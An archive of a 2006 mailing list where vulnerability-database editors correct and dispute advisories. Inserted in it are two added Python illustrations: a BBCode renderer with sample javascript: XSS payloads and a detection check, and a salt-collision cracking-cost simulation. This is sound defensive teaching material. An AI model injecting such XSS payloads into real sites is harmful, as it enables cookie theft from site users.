Check followup forum posts from musox and DJMaze. Not clear if musox is aware that the issue is in his/her product; I'll try to send an email.

- Steve

From coley at mitre.org Thu Feb 16 01:26:00 2006
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 16 Feb 2006 01:26:00 -0500 (EST)
Subject: [VIM] Recent HP advisories outline BIND problems
Message-ID: <200602160626.k1G6Q0c5015080@faron.mitre.org>

An update to an HP advisory provided more details on the issue, where they originally had been extremely vague. It quotes the ISC web page as saying:

  "BIND4/BIND8 Unsuitable for Forwarder Use... If a nameserver -- any
  nameserver, whether BIND or otherwise -- is configured to use
  'forwarders', then none of the target forwarders can be running BIND4 or
  BIND8. Upgrade all nameservers used as 'forwarders' to BIND9. There is a
  current, wide scale Kashpureff-style DNS cache corruption attack which
  depends on BIND4 and BIND8 as 'forwarders' targets."

This turns out to be related to some series of attacks that took place in April 2005 and further exposed by Dan Kaminsky in August:

http://computerworld.com/networkingtopics/networking/story/0,10801,103744,00.html

So it's been publicly known for a while. Just FYI in case I'm not the only person who missed all this when it first happened ;-)

- Steve

From jericho at attrition.org Fri Feb 17 00:51:54 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 17 Feb 2006 00:51:54 -0500 (EST)
Subject: [VIM] fake vulnerability extortion?

http://archives.neohapsis.com/archives/bugtraq/2006-02/0086.html

  Hi everyone! the January 23 me was done work on revealing the
  criticality in forum vBulltin(3.0.7 - 3.5.3) and IPB(2.0.0 - 2.1.4).
  -------------------------------------------------------------------------
  The Criticality were find nearly similar nature. Later I have tested
  them on rest version and they have in the same way operated. After two
  three days were written two exploits under these two forums. Eksploit
  allows to get web - shell on server where is installed forum. So much
  for that I can say on this cause. Letter this has wrote therefor that
  developers of these programme products knew that in them there are
  mistakes for attention.
http://archives.neohapsis.com/archives/bugtraq/2006-02/0103.html > No, I nobody has not reported on this criticality. Let all read > message on securityfocus.com. poc will possible be on sale only > narrow circle of the people from russian hacker So your exploit is not being reported to the vendors and you are going to sell this? http://archives.neohapsis.com/archives/bugtraq/2006-02/0104.html While we take all security reports seriously we have investigated this report and have been unable to find any sort of exploit suggested by the author. After contacting the author for more information the response we received was that a fee would have to be paid for more information. As a company we refuse to be coerced into paying a ransom given that the author has not been able to demonstrate that the vulnerability exists, much less a willingness to work with us to ensure a secure product for end users. http://archives.neohapsis.com/archives/bugtraq/2006-02/0221.html I sent him an email about his bugs and exploits. He asked me to add him in his ICQ. I told him I dont have and I gave him my msn and he added me. He asked me if I want the exploits I have to pay 500$. I said how and he gave me a site for transfring money. I told him I cant. I said if you want me to transfer money by paypal I will do.Then, he said yes. I told him do you have an account and he replied No. I opend an account for him, new account and gave him the password.He asked me to send money. I did :) I sent him 500$. Then he disappeared and he gave me nothing. He thinks he took 500$ :) He doesnt know anything and he is from russia and his langauge is broken. This is the result: We got a new king of rippers but this time by caiming that the have new exploits and they will sell it. From coley at linus.mitre.org Fri Feb 17 02:16:30 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 17 Feb 2006 02:16:30 -0500 (EST) Subject: [VIM] fake vulnerability extortion? 
In-Reply-To:
References:
Message-ID:

I thought it was strange that this didn't result in a flood of commentary. A very interesting allegation. Does this fall under the category "Buyer beware?"

- Steve

From coley at linus.mitre.org Fri Feb 17 17:23:44 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 17 Feb 2006 17:23:44 -0500 (EST)
Subject: [VIM] CVE-2006-0591 (crypt_blowfish) (fwd)
Message-ID:

The CVE description for crypt_blowfish originally had a couple inaccuracies in it, including claiming a remote attack vector. Solar Designer sent us the following email with corrections, and given that he mentioned trying to get this fixed in other vuln DBs, I thought I'd pass it on.

- Steve

---------- Forwarded message ----------
Date: Sat, 18 Feb 2006 00:41:45 +0300
From: Solar Designer
To: cve at mitre.org
Subject: CVE-2006-0591 (crypt_blowfish)

Hi,

After trying to get this misinformation corrected in several vulnerability databases, I realized that it actually comes from CVE... The description says:

"The crypt_gensalt functions for BSDI-style extended DES-based and FreeBSD-sytle MD5-based password hashes in crypt_blowfish 0.4.7 and earlier do not evenly and randomly distribute salts across the hash space, which makes it easier for remote attackers to guess passwords due to the increased number of collisions."

The word "remote" is very wrong. One has to have a copy of the shadow password file (perhaps obtained via _another_ vulnerability) in order to exploit this.

Also, the words "across the hash space" are wrong. Salts are not a part of the hash space.

I suggest that you correct the description as follows:

"The crypt_gensalt functions for BSDI-style extended DES-based and FreeBSD-style MD5-based password hashes in crypt_blowfish 0.4.7 and earlier do not evenly and randomly distribute salts, which makes it easier for attackers with a stolen copy of the password file to guess passwords due to the increased number of salt collisions."

Thanks,

--
/sd

From jericho at attrition.org Fri Feb 17 18:04:14 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 17 Feb 2006 18:04:14 -0500 (EST)
Subject: [VIM] Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability
In-Reply-To: <20060216134720.19252.qmail@securityfocus.com>
References: <20060216134720.19252.qmail@securityfocus.com>
Message-ID:

Hi Federico,

Regarding your advisory:

http://archives.neohapsis.com/archives/bugtraq/2006-02/0262.html
http://archives.neohapsis.com/archives/bugtraq/2006-02/0274.html

: Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

: Information of Software:
:
: Software: Siteframe Beaumont 5.0.1a

Can you confirm which version you tested, 5.0.1a or 5.0.2?

Brian
OSVDB.org

From coley at mitre.org Fri Feb 17 20:05:55 2006
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 17 Feb 2006 20:05:55 -0500 (EST)
Subject: [VIM] Codebase relationships between My Blog and M. Blom HTML::BBCode
Message-ID: <200602180105.k1I15tAo022570@cairo.mitre.org>

FYI. I ran into this accidentally while reviewing some alex at evuln advisories. He linked 2 distinct issues to the same CVE, and it turns out he was right, based on CVE's content decisions.

In short: the M. Blom HTML::BBCode product produces a "BBCode.pm" that is included in My Blog, and maybe other products too. The "BBCode.pm" from a fixed My Blog, and a fixed HTML::BBCode, is exactly the same. Since CVE merges issues if they share the same codebase, these 2 products were merged into a single CVE. See below.

- Steve

======================================================
Name: CVE-2006-0735
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0735
Announced: 20060213
Flaw: XSS
Reference: BUGTRAQ:20060215 [eVuln] My Blog BBCode XSS Vulnerabilities
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/425087/100/0/threaded
Reference: MISC:http://evuln.com/vulns/79/summary.html
Reference: BUGTRAQ:20060215 [eVuln] M. Blom HTML::BBCode perl module XSS Vulnerabilities
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/425113/100/0/threaded
Reference: MISC:http://www.evuln.com/vulns/80/summary.html
Reference: CONFIRM:http://menno.b10m.net/perl/HTML-BBCode/Changes
Reference: CONFIRM:http://menno.b10m.net/perl/dists/HTML-BBCode-1.05.tar.gz
Reference: CONFIRM:http://fuzzymonkey.net/forum/viewtopic.php?t=856
Reference: BID:16659
Reference: URL:http://www.securityfocus.com/bid/16659

Cross-site scripting (XSS) vulnerability in BBcode.pm in M. Blom HTML::BBCode 1.04 and earlier, as used in products such as My Blog before 1.65, allows remote attackers to inject arbitrary Javascript via a javascript URI in an (1) img or (2) url BBcode tag.

Analysis:

ABSTRACTION: Blom HTML::BBCode is created as a library, and this library is clearly used by My Blog, so CD:SF-CODEBASE applies.

ACKNOWLEDGEMENT: Blom HTML::BBCode changelog says "1.05 ... Fixed XSS bug (Tiket [sic] 17633, 'HTML::BBCode XSS Vulnerabilities') ... Thanks to Alex for reporting." The e-mail for Aliaksandr Hartsuyeu is alex at evuln and thus there are mutual references.

ACKNOWLEDGEMENT: My Blog vendor forum post, dated 20060214, says "New release today. Fixed XXS vulnerability". This aligns with evuln's claims. Also, a source code analysis shows an exact copy of BBCode.pm in My Blog as in the fixed version of HTML::BBCode 1.05.
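The javascript: URI vector behind CVE-2006-0735, as an added example for this archive (it is not HTML::BBCode's or My Blog's code and does not reproduce BBCode.pm): a minimal BBCode-to-HTML renderer in Python, first showing the bug class, then the fix. The tag grammar, the scheme allowlist, the helper names and the sample posts are all constructed for the illustration, not taken from the advisories or the module.

```python
"""BBCode [url]/[img] rendering and the javascript: URI hole (CVE-2006-0735 class).

Added example, not HTML::BBCode or My Blog code. render_unsafe() shows the
bug class: HTML-escaping the tag argument stops attribute breakout but does
nothing about the URI scheme, so a javascript: URI lands in href/src intact.
render_safe() adds the missing check, a scheme allowlist.
"""
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample posts (not taken from the advisories).
SAMPLE_POSTS = [
    "see [url=http://example.com/page]here[/url]",
    "[url=javascript:alert(document.cookie)]click me[/url]",
    "[img]javascript:alert(1)[/img]",
    '[img]http://example.com/a.png" onerror="alert(1)[/img]',
]

URL_RE = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.S)
IMG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.S)
SAFE_SCHEMES = {"http", "https", "ftp"}   # hypothetical allowlist for this demo


def _attr(value: str) -> str:
    """HTML-escape for use inside a double-quoted attribute."""
    return html.escape(value, quote=True)


def render_unsafe(text: str) -> str:
    """Vulnerable renderer: escapes metacharacters but accepts any scheme."""
    text = URL_RE.sub(lambda m: f'<a href="{_attr(m.group(1))}">{html.escape(m.group(2))}</a>', text)
    text = IMG_RE.sub(lambda m: f'<img src="{_attr(m.group(1))}">', text)
    return text


def safe_uri(raw: str) -> Optional[str]:
    """Return the URI if its scheme is allowlisted, else None.

    Control characters are stripped before parsing because browsers of the
    period ignored embedded tabs/newlines, so 'java\\nscript:' would still
    run. Relative URIs (no scheme) are rejected here as well; a real
    product would decide that per feature.
    """
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", raw).strip()
    if urlsplit(cleaned).scheme.lower() not in SAFE_SCHEMES:
        return None
    return cleaned


def render_safe(text: str) -> str:
    """Fixed renderer: scheme allowlist on the URI plus attribute escaping."""
    def url_repl(m):
        uri = safe_uri(m.group(1))
        label = html.escape(m.group(2))
        # Drop the link but keep the visible text when the URI is rejected.
        return label if uri is None else f'<a href="{_attr(uri)}">{label}</a>'

    def img_repl(m):
        uri = safe_uri(m.group(1))
        return "" if uri is None else f'<img src="{_attr(uri)}">'

    text = URL_RE.sub(url_repl, text)
    text = IMG_RE.sub(img_repl, text)
    return text


def has_script_uri(rendered: str) -> bool:
    """Detection check: does any href/src attribute start with javascript:?"""
    return re.search(r'(?:href|src)="\s*javascript:', rendered, re.I) is not None


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print("unsafe:", render_unsafe(post))
        print("safe:  ", render_safe(post))
```

Running it shows why escaping alone was not enough: `javascript:alert(document.cookie)` contains no HTML metacharacters, so `html.escape` passes it through untouched and the unsafe renderer emits a live `href="javascript:..."`, while the safe renderer reduces the tag to its label. The fourth sample shows the complementary point: attribute escaping is still required (the `"` breakout is neutralised in both renderers), it is just not sufficient.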
From sullo at cirt.net Sat Feb 18 12:22:48 2006
From: sullo at cirt.net (Sullo)
Date: Sat, 18 Feb 2006 12:22:48 -0500
Subject: [VIM] [Fwd: Geeklog search.php Failed SQL Query Path Disclosure]
Message-ID: <43F757E8.9020108@cirt.net>

OSVDB-21398
CVE-2005-4026

-------- Original Message --------

Hi,

on , you have the following statement:

--- snip ---
Geeklog contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search.php script not properly sanitizing user-supplied input to the datestart and dateend variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.
[...]
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
--- snip ---

This information is not correct. It was NOT possible to perform an SQL injection. Malformed "date" fields only caused a PHP warning message to be displayed that would disclose the path in which Geeklog is installed on the server.

This issue was resolved with the release of Geeklog 1.3.11sr3 on 2005-12-12 and 1.4.0rc1 on 2005-12-31. Also see

Please update your advisory accordingly. Thank you.

regards,
Dirk Haun (for the Geeklog Team)
--
http://www.geeklog.net/
http://geeklog.info/

--
http://www.cirt.net/ | http://www.osvdb.org/

From coley at linus.mitre.org Sat Feb 18 18:37:47 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sat, 18 Feb 2006 18:37:47 -0500 (EST)
Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd)
In-Reply-To:
References:
Message-ID:

I just ran across this in CVE. He's changed his page so that it only mentions show.php, but the text still mentions $date.

I can confirm seeing the same code as the OSVDB mangler, but I saw it in the .php extension downloads (there is one set of downloads with .php3 and another with .php).

The exploit countdown is down to 2 days, so maybe we'll get more info then :)

- Steve

From coley at linus.mitre.org Sat Feb 18 18:39:17 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sat, 18 Feb 2006 18:39:17 -0500 (EST)
Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd)
In-Reply-To:
References:
Message-ID:

*sigh* correction: in the downloaded version I have, the file is called "date.php", with "date" instead of "data", as the original mangler said.

- Steve

From jericho at attrition.org Sat Feb 18 20:35:12 2006
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 18 Feb 2006 20:35:12 -0500 (EST)
Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd)
Message-ID:

Sorry Steven, I thought I had sent this to the list. I have 23186 (covers date.php) locked until I see what other databases do. If enough keep entries, I will keep it and myth/fake flag it.

---------- Forwarded message ----------
From: Josh Zlatin
To: jericho at attrition.org
Date: Wed, 15 Feb 2006 09:32:14 -0500 (EST)
Subject: Re: EV0074 BirthSys 3.1 SQL injection (fwd)

Well I guess you can remove osvdb #23186.

--
- Josh

---------- Forwarded message ----------
Date: Wed, 15 Feb 2006 16:30:24 +0300
From: Support - eVuln.com
To: Josh Zlatin
Subject: Re: EV0074 BirthSys 3.1 SQL injection

You are right. SQL Injection exists only in "show.php"
date.php is not vulnerable.

Thanks!
Aliaksandr Hartsuyeu
http://evuln.com

> I wanted to clarify the SQL injection in the data.php3 file in BirthSys
> 3.1 that you reported. I was unable to recreate the SQL injection via
> either the 'date' or 'month' variables as both of those are set in the
> date.php3 code itself:
>
> Quoted from BirthSys data.php3:
> $date = date( "d" );
> $month=("$monthName[$currentMonth]");
>
> The only SQL query in that script is:
> $result = mysql_query("SELECT * FROM birthsys WHERE month= $month AND
> day= $date");
>
> so am I missing something or is this a mistake?
>
> Thanks,
>
> --
> - Josh
>

From smoore at securityglobal.net Mon Feb 20 00:58:24 2006
From: smoore at securityglobal.net (Stuart Moore)
Date: Mon, 20 Feb 2006 00:58:24 -0500
Subject: [VIM] vendor dispute for CVE-2006-0669
Message-ID: <43F95A80.60906@securityglobal.net>

Hi,

Regarding CVE-2006-0669 and SecurityTracker 1015600, the vendor disputes the SQL injection claim and indicates that GA Forum Light does not use an SQL database (it uses flat files). I looked through the code and the behavior that was originally reported by Dj_Eyes From Crouz Security Team appears to be a vbscript parsing error instead of an SQL injection problem. We've just written to Dj_Eyes for additional information, but I'm pretty sure we'll be able to close this out as an incorrect report.

Stuart

--
Stuart Moore
SecurityTracker.com
SecurityGlobal.net LLC
smoore at securityglobal.net
+1 301 495 5930 voice
+1 413 691 4346 fax

From coley at linus.mitre.org Mon Feb 20 14:25:54 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 20 Feb 2006 14:25:54 -0500 (EST)
Subject: [VIM] [Fwd: Geeklog search.php Failed SQL Query Path Disclosure]
In-Reply-To: <43F757E8.9020108@cirt.net>
References: <43F757E8.9020108@cirt.net>
Message-ID:

Notice this:

> Also see

It addresses TWO vulns, not just the original r0t one. Associated CVE is below.

- Steve

======================================================
Name: CVE-2005-4725
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4725
Reference: MISC:http://www.geeklog.net/forum/viewtopic.php?showtopic=61457
Reference: CONFIRM:http://www.geeklog.net/article.php/geeklog-1.3.11sr3

Geeklog before 1.3.11sr3 allows remote attackers to bypass intended access restrictions and comment on an arbitrary story or topic by guessing the story ID.
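Going back to Solar Designer's correction of CVE-2006-0591 earlier in this archive, here is an added Python example of why his two edits matter. It is not crypt_blowfish code and does not reproduce the real defect in crypt_gensalt 0.4.7: the "biased" generator below is a hypothetical stand-in that only ever emits a quarter of the itoa64 alphabet. The cost model is the standard one for offline attacks on a stolen password file: testing one candidate password against a group of hashes costs one hash computation per distinct salt in the group, so every salt collision is a free account for the attacker. That is also why "remote" was wrong: the saving is in offline hash computations, which requires holding the file.

```python
"""Salt collisions and offline cracking cost (illustration for CVE-2006-0591).

Added example, not crypt_blowfish code: the bias modelled here is
hypothetical. It shows the two points from the corrected description:
it is the salts that collide (not the hashes), and only an attacker with
a copy of the password file benefits, via fewer hash computations.
"""
import random
from collections import Counter
from typing import Callable, Dict, Set

# The crypt(3) salt alphabet; 4 chars = 24 bits, the extended-DES salt size.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

SaltGen = Callable[[random.Random, int], str]


def uniform_salt(rng: random.Random, length: int = 4) -> str:
    """Correct behaviour: every character uniform over all 64 symbols."""
    return "".join(rng.choice(ITOA64) for _ in range(length))


def biased_salt(rng: random.Random, length: int = 4) -> str:
    """Hypothetical bad generator: only 16 of the 64 symbols are ever
    emitted, so a 4-char salt carries 16 bits of entropy instead of 24."""
    return "".join(rng.choice(ITOA64[:16]) for _ in range(length))


def alphabet_used(gen: SaltGen, samples: int = 2000, seed: int = 0) -> Set[str]:
    """Which symbols a generator actually produces; a cheap skew detector
    to run against any crypt_gensalt implementation you are auditing."""
    rng = random.Random(seed)
    return set("".join(gen(rng, 4) for _ in range(samples)))


def salt_stats(gen: SaltGen, accounts: int, seed: int = 1) -> Dict[str, int]:
    """Simulate a password file with `accounts` entries salted by `gen`.

    cost_per_guess is the number of hash computations an attacker holding
    the file needs to test ONE candidate password against EVERY account:
    one per distinct salt, because accounts that share a salt share the
    computation.
    """
    rng = random.Random(seed)
    counts = Counter(gen(rng, 4) for _ in range(accounts))
    return {
        "accounts": accounts,
        "distinct_salts": len(counts),
        "salt_collisions": accounts - len(counts),
        "cost_per_guess": len(counts),
        "largest_shared_salt_group": max(counts.values()),
    }


def cracking_speedup(accounts: int, seed: int = 1) -> float:
    """How many times cheaper a whole-file dictionary attack becomes when
    the salts came from the biased generator instead of the uniform one."""
    uniform = salt_stats(uniform_salt, accounts, seed)
    biased = salt_stats(biased_salt, accounts, seed)
    return uniform["cost_per_guess"] / biased["cost_per_guess"]


if __name__ == "__main__":
    for name, gen in (("uniform", uniform_salt), ("biased", biased_salt)):
        print(name, salt_stats(gen, 200_000))
    print("attacker speedup: %.1fx" % cracking_speedup(200_000))
```

With 200,000 accounts the uniform generator has a 24-bit salt space and produces almost no collisions, while the 16-bit biased space saturates at 65,536 distinct salts, so the attacker's per-guess work drops by roughly a factor of three; with more accounts the gap only widens, because the biased generator cannot produce more than 65,536 distinct salts however many entries the file has. None of this is reachable by a remote attacker who cannot read the file.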
From jericho at attrition.org Tue Feb 21 13:45:36 2006
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 21 Feb 2006 13:45:36 -0500 (EST)
Subject: [VIM] oh how i love xerox
Message-ID:

As usual, the advisory is vague and repetitive.. every few months, same thing with a new ID number =) This time, look at the wording regarding XSS. So is this something worse than XSS, or do they not quite get it?

http://www.xerox.com/downloads/usa/en/c/cert_XRX06_001.pdf

- Cross-site scripting allowing contents of web pages to be modified in an unauthorized manner

From coley at linus.mitre.org Wed Feb 22 01:31:24 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 22 Feb 2006 01:31:24 -0500 (EST)
Subject: [VIM] oh how i love xerox
In-Reply-To:
References:
Message-ID:

On Tue, 21 Feb 2006, security curmudgeon wrote:

> As usual, the advisory is vague and repetitive.. every few months, same
> thing with a new ID number =) This time, look at the wording regarding
> XSS. So is this something worse than XSS, or do they not quite get it?
>...
>
> - Cross-site scripting allowing contents of web pages to be modified in an
> unauthorized manner

Change "XSS" to "HTML injection" and it makes sense. Stick in a redirect or set the text color to the same as the background color and it makes sense.

Actually, recently I ran across some recent vendor forum for an acknowledgement of an issue, where the initial discovery of the issue happened when a customer was suffering from a redirect XSS attack.

Not that I personally like to use the terminological distinctions between XSS and HTML injection and "script insertion" (?) when from a VDB perspective, 75% of the time you don't know which variant it is in the first place :)

- Steve

From coley at mitre.org Wed Feb 22 20:34:15 2006
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 22 Feb 2006 20:34:15 -0500 (EST)
Subject: [VIM] FYI - Internet Explorer phishing issue
Message-ID: <200602230134.k1N1YFg5011301@cairo.mitre.org>

Regarding the recent IE phishing issue that seemed to be the same as an earlier discovery... Based on my research, there are slight differences. Whether those diff's are relevant to VDB's will vary by editorial policy :) I just sent this to Bugtraq.

- Steve

BUGTRAQ:20060218 Re: Internet Explorer Phishing mouseover issue
URL:http://www.securityfocus.com/archive/1/archive/1/425386/100/0/threaded

The "http-equiv" and "Gandalf" examples are very similar, but I think there might be some important distinctions.

1) The http-equiv example (CVE-2004-1104) uses a BASE tag with an href attribute. In the form, the A tag has an "href=" without a value. The value of the BASE HREF is displayed on the status bar when the user does a mouseover.

2) The Gandalf example (CVE-2006-0799) does not have a base href at all. But the A HREF has a value. The value of the A href is displayed on the status bar when the user does a mouseover.

3) If you use a hybrid of the two previous examples, in which both BASE and A tags specify an href, then the A HREF is displayed on the status bar when the user does a mouseover.

NOTE that the following difference does not seem to have an impact:

4) the http-equiv example has the A tag outside of the form, but the Gandalf example has the A tag inside the form. Switching these around doesn't seem to affect what gets displayed.

Both examples have the same problem in which the form's "action" step is not displayed in the status bar, but as we see above, there are two separate vectors with slightly different results.

This was tested in IE 6.0.2900.2180 on XP.
- Steve

From jericho at attrition.org Thu Feb 23 12:53:17 2006
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 23 Feb 2006 12:53:17 -0500 (EST)
Subject: [VIM] fun vulnerability timelines
Message-ID:

http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0525.html

Disclosure Timeline:
2003-08.??: Vulnerabilities found.
2003-08.??: 1st vendor contact. (didn't respond)
2005-09.30: 2nd vendor contact. (didn't respond)
2005-10.03: 3rd vendor contact. (didn't respond)
2005-10.08: Deleted free download page in vendor (Ooops).
2006-02.17: 4th vendor contact. (didn't respond)
2006-02.22: Public disclosure.

From coley at mitre.org Thu Feb 23 17:52:15 2006
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 23 Feb 2006 17:52:15 -0500 (EST)
Subject: [VIM] Mini-Nuke?
Message-ID: <200602232252.k1NMqFVZ020286@cairo.mitre.org>

I vaguely remember this being a topic of discussion before.

Any information on what/where "Mini-Nuke" is? It seems to trace back to http://www.miniex.net, but the site is in Turkish or some other non-Romance language. I've navigated around it a little bit and can't seem to find a download page.

- Steve

From jericho at attrition.org Thu Feb 23 18:06:33 2006
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 23 Feb 2006 18:06:33 -0500 (EST)
Subject: [VIM] Mini-Nuke?
In-Reply-To: <200602232252.k1NMqFVZ020286@cairo.mitre.org>
References: <200602232252.k1NMqFVZ020286@cairo.mitre.org>
Message-ID:

: I vaguely remember this being a topic of discussion before.
:
: Any information on what/where "Mini-Nuke" is? It seems to trace back to
: http://www.miniex.net, but the site is in Turkish or some other
: non-Romance language. I've navigated around it a little bit and can't
: seem to find a download page.

I have that as the vendor from previous discussion or digging for the two issues published 2006-01-12. Or maybe I got it from Secunia, which I noticed now shows a 3rd issue.

http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html

http://secunia.com/advisories/18439/

From jericho at attrition.org Thu Feb 23 18:07:35 2006
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 23 Feb 2006 18:07:35 -0500 (EST)
Subject: [VIM] Mini-Nuke?
In-Reply-To:
References: <200602232252.k1NMqFVZ020286@cairo.mitre.org>
Message-ID:

: : I vaguely remember this being a topic of discussion before.
: :
: : Any information on what/where "Mini-Nuke" is? It seems to trace back to
: : http://www.miniex.net, but the site is in Turkish or some other
: : non-Romance language. I've navigated around it a little bit and can't
: : seem to find a download page.
:
: I have that as the vendor from previous discussion or digging for the two
: issues published 2006-01-12. Or maybe I got it from Secunia, which I
: noticed now shows a 3rd issue.
:
: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html
:
: http://secunia.com/advisories/18439/

http://www.nukedx.com/?viewdoc=7

Firma [Company]: MiniNuke (www.miniex.net) (www.mini-nuke.info)

From coley at mitre.org Thu Feb 23 21:02:40 2006
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 23 Feb 2006 21:02:40 -0500 (EST)
Subject: [VIM] old Squid clientAbortBody issue - NOT an overflow?
Message-ID: <200602240202.k1O22eK1021618@cairo.mitre.org>

There's an old Squid clientAbortBody issue that was claimed to be a buffer overflow, but the original report seems to be erroneous.

Refs:
MISC:http://www.securitylab.ru/47881.html
OSVDB:9801
SECTRACK:1011214

These sources claim a buffer overflow in clientAbortBody() in client_side.c in Squid before 2.6 STABLE6 (actually, some say STABLE5, which is understandable because the original researcher claims both.)
The key here is the following Squid bug report:

MISC:http://www.squid-cache.org/bugs/show_bug.cgi?id=972

Here is my reconstruction of what happened:

(1) Original bug report to vendor shows null dereference in clientAbortBody; original claim is null deref, and patch shows null deref.

(2) Separate researcher claims overflow in clientAbortBody() for STABLE6 (SECTRACK:1011214), saying "I am still experiencing this problem in STABLE6."

(3) Various vuln DBs reported this issue as an overflow (including OSVDB:9801).

(4) Later in the bug report, the vendor asks the researcher for more information about the STABLE6 problem.

(5) The researcher then retracts the original claim, saying "the release I thought was STABLE6 was a mis-labeled version of Stable5..."

I'll be creating a CVE for the issue, calling it a null dereference in STABLE5. Not sure where the "overflow" claim even came from, but there might be some long fields in the stack trace in message 2 of the bug report (or maybe it's just zeroed memory).

FYI, SECUNIA:12508 is based on the original clientAbortBody null dereference report.

- Steve

P.S. Why yes, figuring this out DID kinda suck.

From coley at mitre.org Fri Feb 24 16:51:00 2006
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 24 Feb 2006 16:51:00 -0500 (EST)
Subject: [VIM] SUSE-SA:2006:010 - dual use
Message-ID: <200602242151.k1OLp09i000380@cairo.mitre.org>

FYI, there appear to be 2 different versions of SUSE-SA:2006:010 out there.

One is for CASA:
http://www.novell.com/linux/security/advisories/2006_10_casa.html

But the Bugtraq post was for Heimdal:
http://www.securityfocus.com/archive/1/archive/1/425979/100/0/threaded

I have an inquiry into SUSE to find out what's up.

- Steve

From coley at linus.mitre.org Mon Feb 27 16:58:16 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 27 Feb 2006 16:58:16 -0500 (EST)
Subject: [VIM] Vendor ACK - CVE-2005-2776 & CVE-2005-2777 update (right link) (fwd)
Message-ID:

---------- Forwarded message ----------
Date: Mon, 27 Feb 2006 20:25:58 +0100 (CET)
From: LookingGlass
To: cve at mitre.org
Subject: CVE-2005-2776 & CVE-2005-2777 update (right link)

Hi,

I just found out that one of my old tools has some vulnerabilities. An updated version is at my site, check out: (update with right link)

http://de-neef.net/articles.php?id=2&page=2

update: Sun Feb 12 21:32:51 CET 2006
fixed an arbitrary command execution in the DNS Lookup argument.
Note that in order to avoid Cross Site Scripting you need to run with "register_globals=off" (as anybody should anyway).
Added ipv4 only functionality, check form.php, and follow comments inline.

Could you please update the CVE's?

Grtz,

Nf.
--

From coley at mitre.org Mon Feb 27 17:42:06 2006
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 27 Feb 2006 17:42:06 -0500 (EST)
Subject: [VIM] Vendor clarification on CVE-2006-0732 (SAP Business Connector)
Message-ID: <200602272242.k1RMg6s7029284@cairo.mitre.org>

CVE was contacted by a representative of webMethods regarding CVE-2006-0732. As of 2006/02/27, details of the problem are not available due to the researcher's delayed disclosure. However, the webMethods representative wanted to provide some additional clarification. Since they do not go through public channels like Bugtraq, they reviewed and agreed with my following summary of their comments:

SAP Business Connector is an OEM version of webMethods Integration Server. webMethods states that this issue can only occur when the product is installed as root/admin, and if the attacker has access to a general purpose port; however, both are discouraged in the documentation. In addition, the attacker must already have acquired administrative privileges through other means.

- Steve

======================================================
Name: CVE-2006-0732
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0732
Reference: BUGTRAQ:20060215 CYBSEC - Security Pre-Advisory: Arbitrary File Read/Delete in SAPBC
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/425048/100/0/threaded
Reference: MISC:http://www.cybsec.com/vuln/CYBSEC_Security_Pre-Advisory_Arbitrary_File_Read_or_Delete_in_SAP_BC.pdf
Reference: BID:16668
Reference: URL:http://www.securityfocus.com/bid/16668
Reference: FRSIRT:ADV-2006-0611
Reference: URL:http://www.frsirt.com/english/advisories/2006/0611
Reference: SECTRACK:1015639
Reference: URL:http://securitytracker.com/id?1015639
Reference: SECUNIA:18880
Reference: URL:http://secunia.com/advisories/18880

Unspecified vulnerability in SAP Business Connector 4.6 and 4.7 allows remote attackers to read or delete arbitrary files via unspecified vectors. NOTE: This information is based upon a vague initial disclosure. Details will be updated after the grace period has ended. NOTE: SAP Business Connector is an OEM version of webMethods Integration Server. webMethods states that this issue can only occur when the product is installed as root/admin, and if the attacker has access to a general purpose port; however, both are discouraged in the documentation. In addition, the attacker must already have acquired administrative privileges through other means.

From coley at mitre.org Mon Feb 27 20:26:30 2006
From: coley at mitre.org (Steven M.
Christey)
Date: Mon, 27 Feb 2006 20:26:30 -0500 (EST)
Subject: [VIM] Vendor dispute - CVE-2005-4486 - Quantum Art QP7.Enterprise
Message-ID: <200602280126.k1S1QU0W000252@cairo.mitre.org>

Source Ref: http://pridels.blogspot.com/2005/12/qp7enterprise-sql-vuln.html

